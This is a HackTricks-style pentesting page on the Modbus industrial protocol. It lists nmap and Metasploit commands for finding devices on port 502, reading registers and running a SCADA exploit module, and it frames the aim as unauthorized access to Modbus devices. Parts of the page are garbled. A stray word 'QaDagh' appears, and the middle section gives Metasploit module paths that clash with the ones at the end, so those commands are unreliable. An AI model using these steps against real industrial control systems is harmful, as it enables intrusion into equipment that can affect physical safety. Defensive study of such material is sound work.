4.6 KiB
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
In 1979, the Modbus Protocol was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently.
Default port: 502
PORT STATE SERVICE
502/tcp open modbus
QaDagh
Port Scanning
nmap
The first step in enumerating Modbus services is to perform a port scan using nmap. This will help identify open ports on the target system.
nmap -p 502 <target_ip>
Metasploit
Metasploit also provides modules for scanning Modbus services. The auxiliary/scanner/modbus/modbusclient module can be used to scan for Modbus devices.
use auxiliary/scanner/modbus/modbusclient
set RHOSTS <target_ip>
run
Modbus Enumeration
Once the Modbus service is identified, the next step is to enumerate the available Modbus units and their associated registers.
Modscan
Modscan is a popular tool for Modbus enumeration. It can be used to scan for Modbus devices and retrieve information about their registers.
modscan32.exe <target_ip>
Metasploit
Metasploit also provides modules for Modbus enumeration. The auxiliary/scanner/modbus/modbus_read module can be used to read Modbus registers.
use auxiliary/scanner/modbus/modbus_read
set RHOSTS <target_ip>
run
Modbus Exploitation
Once the Modbus units and registers are enumerated, it is possible to exploit vulnerabilities in the Modbus implementation.
Modbus Client
Modbus Client is a tool that can be used to interact with Modbus devices. It allows sending custom Modbus requests and analyzing the responses.
modbusclient.exe <target_ip>
Metasploit
Metasploit provides modules for exploiting Modbus vulnerabilities. The exploit/windows/scada/indusoft_web_studio_exec module can be used to exploit InduSoft Web Studio vulnerabilities.
use exploit/windows/scada/indusoft_web_studio_exec
set RHOSTS <target_ip>
run
Conclusion
Enumeration is a crucial step in the Modbus pentesting process. By identifying open ports, enumerating Modbus units and registers, and exploiting vulnerabilities, it is possible to gain unauthorized access to Modbus devices.
nmap --script modbus-discover -p 502 <IP>
msf> use auxiliary/scanner/scada/modbusdetect
msf> use auxiliary/scanner/scada/modbus_findunitid
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.